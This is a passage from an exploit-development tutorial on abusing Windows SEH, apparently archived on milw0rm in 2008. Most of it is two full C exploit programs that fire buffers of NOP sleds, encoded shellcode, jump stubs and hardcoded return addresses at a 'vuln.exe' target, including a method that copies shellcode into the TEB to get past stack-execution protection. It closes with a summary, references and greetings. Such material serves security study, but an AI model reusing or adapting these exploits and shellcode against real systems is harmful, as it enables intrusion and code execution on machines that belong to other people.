"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

//NOTE!: DELETE needless

/* WIN 2000 and XP Unpached
 * EBX-based addressing
 */
char minicode[] = 
"\x66\x81\xeb\xa0\x01"  //sub bx, 0x1A0
"\xff\xe3";             //jmp bx          

/* WIN2000, WINXP
 * Current stack pointer-based addressing
 */
char minicode[]=
"\x89\xe0"           //mov eax, esp
"\x66\x05\xe4\x03"   //add ax, 0x3e4
"\xff\xe0";          //jmp eax

int main(int argc, char *argv[])
{
char *bufExe[3];
char buf[700];
int i;
char *ptr = buf;

memset(buf, 0, sizeof(buf));
bufExe[0] = "vuln.exe";
bufExe[2] = NULL;

strcpy(buf, "\x90\x90\x90\x90");
strcat(buf, shellcode);                  
for(i=sizeof(shellcode);i<416;i++)
strcat(buf, "\x90");                   

*(unsigned long *)&buf[416] = JUMP;
*(unsigned long *)&buf[420] = RET;
strcat(buf, "\x90\x90\x90\x90");
strcat(buf, minicode);
bufExe[1] = buf;
execve(bufExe[0],bufExe,NULL);	
return 0;
}
--------------------------------exploit3.c-------------------------------

Of course there is also a posibility to use EIP to address the shellcode.
Just use this trick:

  jmp a
  b:pop ebx    <--- now, the EIP value is in the EBX register

  //code       <--- here place your code (sub or add, and than jump)

  a:call b


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
&>&>&<&><&>&<>&<>&<&><&>666[***exploit4.c]666<&><&>&<>&<>&<&><&>&<&<&
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                       (execution in TEB block)


The last method is very interesting because if the stack was configured to
forbid the execution of code that is placed on it, it will bypass it. How?
All the details are in my paper [1] but now I write only the general concept.
In TEB blocks there are some free locations, that are not used.For example, 
starting from 0x7FFDE1BC there is a buffer containing only NULL bytes, which 
we can overwrite. So the vuln.exe's buffer should look like the following:
                                                                       
[NOPs][shellcode][NOP][jump 6][call ebx, pop-pop-ret][NOP][BUF_ADDR][TEB][TEB][JUMP lstrcpyA]

where:

BUF_ADR         --> the address of the buffer with shellcode placed on the stack (address)
TEB             --> the address in the TEB block where we copy our shellcode and 
                    the return address for lstrcpyA (so the TEB block either ;])
JUMP lstrcpyA   --> a jump to a funtion that copies data (lstrcpyA, lstrcatA and so on)

--------------------------------exploit4.c-------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define RET 0x79392C0B   //jmp ebx, pop-pop-ret
#define JUMP 0x909006EB

//NOTE: DELETE needless
//For Win2000 and XP Unpatched
char minicode[]=
"\xb8\x5C\xDF\x35\x79"   //mov eax, STRCPY_FUNC  <-- the lstrcpyA's address
"\x66\x81\xeb\x9f\x01"   //sub bx, 190           <-- EBX should point to the NOP sledge before shellcode
"\x53"                   //push ebx              <-- push the address of buffer on the stack   
"\x68\xbc\xe1\xfd\x7f"   //push TEB              <-- copy to 0x7FFDE1BC
"\x68\xbc\xe1\xfd\x7f"   //push TEB              <-- and return to 0x7FFDE1BC
"\xff\xe0";              //jmp eax               <-- jump to lstrcpyA

//For Win2000, XP SP0-1
char minicode[]=
"\x89\xe3"               //mov ebx, esp
"\x66\x81\xc3\xe4\x03"   //add bx, 0x3e4         <-- EBX should point to the NOP sledge before shellcode
"\xb8\x5C\xDF\x35\x79"   //mov eax, STRCPY_FUNC
"\x53"                   //push ebx
"\x68\xbc\xe1\xfd\x7f"   //push TEB
"\x68\xbc\xe1\xfd\x7f"   //push TEB
"\xff\xe0";              //jmp eax

char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

int main(int argc, char *argv[])
{
char *bufExe[3];
char buf[700];
int i;
char *ptr = buf;

memset(buf, 0, sizeof(buf));
bufExe[0] = "vuln.exe";
bufExe[2] = NULL;

strcpy(buf, "\x90\x90\x90\x90");
strcat(buf, shellcode);                  
for(i=sizeof(shellcode);i<416;i++)
strcat(buf, "\x90");

*(unsigned long *)&buf[416] = JUMP;
*(unsigned long *)&buf[420] = RET;
strcat(buf, "\x90");
strcat(buf, minicode);

bufExe[1] = buf;
execve(bufExe[0],bufExe,NULL);	
return 0;
}
--------------------------------exploit4.c-------------------------------


><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><
>                   [>>5<<]. Summary                      <
>---------------------------------------------------------<


In this paper, I have described the way how SEH works, how to use it and
how to abuse it :). The knowledge from this paper provides a firm basis for
furhter research concerning on bypassing /SAFESEH, /GS or the stack protection
in Windows Server 2003. In the nearest future, the DaRk-CodeRs Group (maybe it
will be me once again) will probably publish results of our research :)
Stay tuned!!!

All questions, suggestions, comments -> e-mail address is in the title;]


><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><
>                [>>6<<].Further reading                  <
>---------------------------------------------------------<


[1]  paper: "Shellcode locations and buffer overflows in Windows" at
     www.milw0rm.com/papers/205 | www.packetstormsecurity.com/shellcode/shellcode-locations.txt
[2]  paper: http://mirror.href.com/thestarman/asm/2bytejumps.htm
[3]  paper: http://www.eeye.com/html/resources/newsletters/vice/VI20060830.html
[4]  paper: www.ngssoftware.com/papers/NISR.BlindExploitation.pdf
[5]  paper: www.ngssoftware.com/papers/defeating-w2k3-stack-protection.pdf
[6]  book : Jack Koziol - "The Shellcoder's Handbook"
[7]  book : Eldad Eilam - "Reversing: Secrets of Reverse Engineering"


><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><
>                 [>>7<<]. Greetz'                        <
>---------------------------------------------------------<


Hard case :) Generally, I thank all people, I know (eeemmm, and i like of course ;]).
You all have contributed something to this paper and to my life;]. Particularly:
Ola N. (for everything: thanks baby :*), Mr. Piotr S. (for technical support (especially 
for provision:)) and for everything else), Pawel J. (for friendship), 0in(for enforced me 
to write about fuckin' SEH), c0ndemned, Die_Angel, m4r1usz, Katharsis(for "mental" support :)),
e.wiZz(hope you're doin' better and keep on fighting), Dobosz (for Steam's account), wilm@n, 
Konrad CZ. 



Stay secure


==[END OF FUCKIN' FILE]==

# milw0rm.com [2008-08-18]